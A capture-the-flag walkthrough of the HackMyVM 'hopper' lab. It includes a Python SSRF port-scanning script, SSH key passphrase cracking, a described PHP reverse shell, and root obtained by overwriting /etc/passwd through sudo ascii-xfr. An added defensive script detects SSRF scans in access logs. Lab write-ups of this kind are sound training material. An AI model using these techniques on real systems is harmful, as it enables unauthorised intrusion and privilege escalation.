hackmyvm-hopper walkthrough
2022-08-02 03:59:00 【xdeclearn】
hackmyvm: hopper
Information collected to get the first shell
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
After the full port scan, visit the web service first.
Use gobuster to scan for directories; it finds the directory advanced-search, where an SSRF exists.
The virtual machine has three users who can log in with bash: root, edward, and henry.
A simple test shows that remote file inclusion is not possible; the page presumably calls curl_exec. For exploiting SSRF in PHP, see SSRF in PHP [1]. This case is a little unusual: there is no redis and no mysql, so the host's ports are probed instead.
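#!/usr/bin/python3
# Probe ports on the target's loopback interface through the SSRF in path.php
import requests

for port in range(1, 65536):  # ports 1-65535 inclusive
    res = requests.get('http://192.168.143.191/advanced-search/path.php?path=http://127.0.0.1:%d' % port)
    if len(res.text) == 0:
        continue  # empty body: nothing answered on this port
    print('-----------------------')
    print('port %d\n' % port)
    print(res.text)
    print('-----------------------')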
The new port obtained by scanning is 2222.
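From the defender's side, the probe above leaves a distinctive trail in the web server's access log: one client requesting path.php with many different loopback ports in the path parameter. The following is an added example, not part of the original post; the log format, the client addresses, the sample lines and the threshold are constructed assumptions.

```python
import ipaddress
import re
from collections import defaultdict
from urllib.parse import parse_qs, urlsplit

# Constructed Apache-style access-log lines (assumed format), not taken from the post.
SAMPLE_LOG = """\
192.168.143.10 - - [02/Aug/2022:03:10:01 +0000] "GET /advanced-search/path.php?path=http://127.0.0.1:21 HTTP/1.1" 200 0
192.168.143.10 - - [02/Aug/2022:03:10:01 +0000] "GET /advanced-search/path.php?path=http://127.0.0.1:22 HTTP/1.1" 200 60
192.168.143.10 - - [02/Aug/2022:03:10:02 +0000] "GET /advanced-search/path.php?path=http://127.0.0.1:80 HTTP/1.1" 200 512
192.168.143.10 - - [02/Aug/2022:03:10:09 +0000] "GET /advanced-search/path.php?path=http%3A%2F%2F127.0.0.1%3A2222 HTTP/1.1" 200 310
192.168.143.20 - - [02/Aug/2022:03:11:00 +0000] "GET /advanced-search/path.php?path=http://example.com/page HTTP/1.1" 200 900
192.168.143.20 - - [02/Aug/2022:03:11:05 +0000] "GET /advanced-search/path.php?path=http://127.0.0.1:80 HTTP/1.1" 200 512
"""

# client address and request target from a common/combined log line
REQUEST_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) [^"]*"')

def internal_target(url):
    """Return (ip, port) if url names a loopback/private/link-local address, else None."""
    try:
        parts = urlsplit(url)
        host = parts.hostname or ""
        addr = ipaddress.ip_address("127.0.0.1" if host == "localhost" else host)
        port = parts.port or {"http": 80, "https": 443}.get(parts.scheme, 0)
    except ValueError:
        return None  # malformed URL, or a hostname (resolving it is out of scope here)
    if addr.is_loopback or addr.is_private or addr.is_link_local:
        return str(addr), port
    return None

def find_ssrf_port_scans(log_text, param="path", threshold=3):
    """Map client IP -> sorted internal ports requested, for clients at or above threshold."""
    ports = defaultdict(set)
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        client, target = m.groups()
        # parse_qs URL-decodes values, so percent-encoded targets are caught too
        for value in parse_qs(urlsplit(target).query).get(param, []):
            hit = internal_target(value)
            if hit:
                ports[client].add(hit[1])
    return {c: sorted(p) for c, p in ports.items() if len(p) >= threshold}

if __name__ == "__main__":
    print(find_ssrf_port_scans(SAMPLE_LOG))
```

The same internal_target check, applied before the server-side fetch rather than after the fact, is the basis of a mitigation: refuse any path value that names a loopback or private address.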
Next comes directory discovery: brute-forcing directories reveals a directory named backup.
It turned out to be a passphrase-protected SSH key, so use john to crack it (see JTR (John The Ripper)'s ssh key crack record [2]); the passphrase is barcelona.
Use id_rsa to log in over ssh as user edward and get the user flag.
Switch user
Write a PHP reverse-shell script into the /var/www/html directory to obtain a shell as user www-data.
Check whether this user has sudo privileges.
Following GTFOBins [3], switch to user henry (note that the environment variable must be set with export TERM=xterm before running the program).
Elevate to root
View the sudo permissions for user henry.
This is relatively simple: change /etc/passwd.
Copy passwd to the tmp directory and replace the x in the root user's entry with a known encrypted password.
Then, from /tmp, use the command sudo /usr/bin/ascii-xfr -rv /etc/passwd
Reference
[1] https://blog.csdn.net/bylfsj/article/details/105083164
[2] https://blog.csdn.net/qq_40490088/article/details/97812715
[3] https://gtfobins.github.io/